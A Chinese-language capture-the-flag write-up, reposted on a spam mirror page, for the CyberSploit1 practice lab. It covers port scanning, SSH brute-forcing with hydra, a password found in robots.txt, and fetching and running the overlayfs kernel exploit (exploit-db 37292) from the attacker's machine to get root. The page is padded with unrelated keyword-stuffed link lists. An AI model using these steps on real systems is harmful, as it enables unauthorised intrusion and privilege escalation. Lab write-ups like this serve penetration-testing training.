当前位置: 首页 > news >正文

广东建设安全协会网站百度官网网址

广东建设安全协会网站,百度官网网址,代码生成器应用,哪个网站做任务给东西OSCP系列靶场-Esay-CyberSploit1 总结 getwebshell → 源码注释发现用户名 → robots.txt发现base64密码 → SSH登录 提 权 思 路 → 内网信息收集 → 发现发行版本有点老 → 内核overlayfs提权 准备工作 启动VPN 获取攻击机IP > 192.168.45.220 启动靶机 获取目标机器I…

OSCP系列靶场-Esay-CyberSploit1

总结


getwebshell → 源码注释发现用户名 → robots.txt发现base64密码 → SSH登录

提 权 思 路 → 内网信息收集 → 发现发行版本有点老 → 内核overlayfs提权

准备工作


  • 启动VPN
    获取攻击机IP > 192.168.45.220

  • 启动靶机
    获取目标机器IP > 192.168.176.92

    信息收集-端口扫描


     目标开放端口收集

  • Nmap开放端口扫描2次
  1. ┌──(root㉿Kali)-[/home/bachang/CyberSploit1]

  2. └─# ┌──(root㉿Kali)-[/home/bachang/Blogger]

  3. └─# sudo nmap --min-rate 10000 -p- 192.168.176.92

  4. Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-23 11:45 CST

  5. Nmap scan report for 192.168.176.92

  6. Host is up (0.30s latency).

  7. Not shown: 65533 closed tcp ports (reset)

  8. PORT STATE SERVICE

  9. 22/tcp open ssh

  10. 80/tcp open http

  11. Nmap done: 1 IP address (1 host up) scanned in 9.39 seconds

 

通过两次收集到的端口:→22,80

目标端口对应服务探测

  1. # tcp探测

  2. sudo nmap -sT -sV -O -sC -p22,80 192.168.176.92

 

信息收集-端口测试

两个端口的话,通常突破口在80端口

22-SSH端口的信息收集

22-SSH端口版本信息与MSF利用(待定)

通过Nmap探测获得SSH的版本信息,可以尝试利用

  1. # 进入msf # 探测版本为OpenSSH 5.9p1 Debian 5ubuntu1.10

  2. msfconsole

  3. # 搜索对应脚本

  4. msf6 > searchsploit OpenSSH 5.9p1

貌似存在用户枚举,等没思路的时候可以来试试

22-SSH手动登录尝试(失败)

尝试root账户的密码爆破

  1. ssh root@192.168.176.92 -p 22

  2. # 密码尝试

  3. password > root

 22-SSH弱口令爆破(挂着干别的)

尝试root账户的密码爆破,利用工具hydra,线程-t为6

1.hydra -l root -P /usr/share/wordlists/metasploit/password.lst -t 6 -vV 192.168.176.92 ssh -s 22

80-HTTP端口的信息收集

访问 http://192.168.176.92/ 发现不是一个标准的CMS从源码查看开始

信息收集-源码查看
  1. # 包括文章中是否写明一些敏感信息

  2. curl http://192.168.176.92:80

收集到一个用户名信息 itsskv

信息收集-目录扫描
信息收集-目录扫描初步
  1. dirsearch -u http://192.168.176.92:80 -x 302,403

因为扫出了目录,深层次的扫描待选

  1. 信息收集-目录扫描(后缀)

  2. 信息收集-目录扫描(深度/大字典)

  3. 信息收集-目录扫描(深度/大字典后缀)

信息收集-目录访问

/robots.txt端点访问
存在一串代码,推测是加密,带等号尝试用bashe64解密

1.Y3liZXJzcGxvaXR7eW91dHViZS5jb20vYy9jeWJlcnNwbG9pdH0=

base64解密

利用kali解密得到了内容,确认是base64加密

  1. ┌──(root㉿Kali)-[/home/bachang/Blogger]

  2. └─# echo "Y3liZXJzcGxvaXR7eW91dHViZS5jb20vYy9jeWJlcnNwbG9pdH0=

  3. " | base64 -d

  4. cybersploit{youtube.com/c/cybersploit}

另外两个端点没东西

漏洞利用-getwebshell

信息泄露getwebshell

已知用户名 itsskv 和 cybersploit{youtube.com/c/cybersploit}
头脑风暴一下,密码会不会和cybersploit{youtube.com/c/cybersploit}有关
之前hyrda可以爆破说明22端口是允许账号密码登录的

22-SSH账号密码登录(成功)

获取账号密码之后利用SSH进行登录

  1. ssh itsskv<span>@192.168.176.92</span> -p22

  2. password &gt; cybersploit (失败)

  3. password &gt; cybersploit{youtube.com/c/cybersploit}(成功)

密码真长,我真的会谢

内网遨游-getshell


FLAG1获取

  1. # 有2个,理论上排除掉第一个,找home下

  2. itsskv<span>@cybersploit-CTF</span>:~$ find / -name local.txt 2&gt;/dev/null

  3. /usr/share/checkbox/jobs/local.txt

  4. /home/itsskv/local.txt

  5. itsskv<span>@cybersploit-CTF</span>:~$ cat /home/itsskv/local.txt

  6. *********************

信息收集-内网基础信息收集

在获取shell之后我们要进行内网信息的收集,都是为了提权做准备

检测操作系统的发行版本
  1. # 确定发行版本 较老

  2. itsskv<span>@cybersploit-CTF</span>:~$ lsb_release -a

  3. No LSB modules are available.

  4. Distributor ID: Ubuntu

  5. Description: Ubuntu 12.04.5 LTS

  6. Release: 12.04

  7. Codename: precise

查看内核版本信息
  1. # 确定内核版本

  2. itsskv<span>@cybersploit-CTF</span>:~$ uname -a

  3. Linux cybersploit-CTF 3.13.0-32-generic #57~precise1-Ubuntu SMP Tue Jul 15 03:50:54 UTC 2014 i686 athlon i386 GNU/Linux

确认home目录下用户
  1. itsskv<span>@cybersploit-CTF</span>:~$ ls -al /home

  2. total 16

  3. # 有两个用户

  4. drwxr-xr-x 22 cybersploit cybersploit 4096 Sep 4 2020 cybersploit

  5. drwxr-xr-x 20 itsskv itsskv 4096 Sep 4 2020 itsskv

确认home目录下是否有隐藏文件
  1. # 例如.ssh找密码 ./*_history找历史记录等

  2. itsskv<span>@cybersploit-CTF</span>:~$ ls -al /home/itsskv

  3. # 查看了一下没啥

  4. drwxr-xr-x 20 itsskv itsskv 4096 Sep 4 2020 .

  5. drwxr-xr-x 4 root root 4096 Jun 25 2020 ..

  6. -rw------- 1 itsskv itsskv 0 Sep 4 2020 .bash_history

  7. -rw-r--r-- 1 itsskv itsskv 220 Jun 25 2020 .bash_logout

  8. -rw-r--r-- 1 itsskv itsskv 3486 Jun 25 2020 .bashrc

  9. drwx------ 14 itsskv itsskv 4096 Jun 25 2020 .cache

  10. drwx------ 9 itsskv itsskv 4096 Jun 25 2020 .config

权限提升

Linux提权-内核overlayfs提权尝试

因为发行版本较老,若存在以下情况进行overlayfsLinux Kernel Version提权

系统版本
Linux Kernel Version大于3.13.0小于3.19
UbuntuLinux 15.04
UbuntuLinux 14.10
UbuntuLinux 14.10
UbuntuLinux 12.04
漏洞利用-内核overlayfs提权
  1. msfconsole

  2. msf &gt; searchsploit overlayfs

结合 3.13.0-32的版本信息选择2与3

  1. # 如果想查看msf对应的内容

  2. cat /usr/share/exploitdb/exploits/linux/local/37292.c

将文件保存在当前目录下,方便开启http服务

  1. ┌──(root㉿Kali)-[/home/bachang/CyberSploit1]

  2. └─# cp /usr/share/exploitdb/exploits/linux/local/37292.c ./shell.c

  3. ┌──(root㉿Kali)-[/home/bachang/CyberSploit1]

  4. └─# ls

  5. hydra.restore shell.c

攻击机开启服务

1.sudo python3 -m http.server 80

目标机器

  1. # 首先到具有权限的目录下 如/tmp

  2. itsskv<span>@cybersploit-CTF</span>:~$ cd /tmp

  3. # 下载

  4. itsskv<span>@cybersploit-CTF</span>:/tmp$ wget http://192.168.45.220/shell.c

  1. # 给权限

  2. itsskv<span>@cybersploit-CTF</span>:/tmp$ chmod +x shell.c

  3. # 如果是c的需要进行编译

  4. itsskv<span>@cybersploit-CTF</span>:/tmp$ gcc shell.c -o shell.c

  5. # 运行

  6. itsskv<span>@cybersploit-CTF</span>:/tmp$ ./shell.c

  7. spawning threads

  8. mount #1

  9. mount #2

  10. child threads done

  11. /etc/ld.so.preload created

  12. creating shared library

  13. # whoami

  14. root

提权成功

FLAG2获取

  1. # cat /root/proof.txt

  2. *********************

完结撒花~~~

原文地址: https://bbs.zkaq.cn/t/30873.html

http://www.yidumall.com/news/8525.html

相关文章:

  • 建营销网站网络服务公司经营范围
  • wordpress国内现状旺道seo工具
  • 政府网站建设企业厦门网络关键词排名
  • 有哪些网站可以做海报设计知乎seo搜索优化是什么
  • 北京市规划网站网络营销有哪些就业岗位
  • 常用来做网站首业的是如何做企业产品推广
  • 南京网站开发xuan南京乐识海洋网络推广效果
  • 网站响应式好吗如何建造自己的网站
  • 云南省城乡建设厅网站google搜索优化方法
  • 中型网站每天访问量seo优化的方法
  • 朝阳区住房和城乡建设委员会网站长沙网站定制
  • 做素材网站服务器网站模板建站公司
  • 北京网站建设哪家比较好汕头seo关键词排名
  • 做搜狗pc网站软件seo的基本工作内容
  • c 网站开发中间层怎么写网络营销推广手段
  • 广州哪里做公司网站号凡科网站官网
  • 网站建设的作用中国互联网协会
  • 贴吧推广引流网站快速排名优化报价
  • 中堂网站建设网络营销课程作业
  • 电商 网站建设文字湖南网络优化
  • 当当网网站建设需求分析重庆seo网站推广费用
  • 深圳前50强网站建设公司地方网站建设
  • 教您如何找专业网站制作公司宁波seo推广外包公司
  • 哪个网站做的最好百度站长工具查询
  • 电子工程网 单片机重庆网站优化排名推广
  • 做海报的网站有哪些nba最新交易汇总
  • 浏览器网页百家号seo
  • 西安住房和城乡建设局网站百度推广代运营公司
  • 网站收录图片搜索引擎网站有哪些
  • 网站办理前置审批郑州seo管理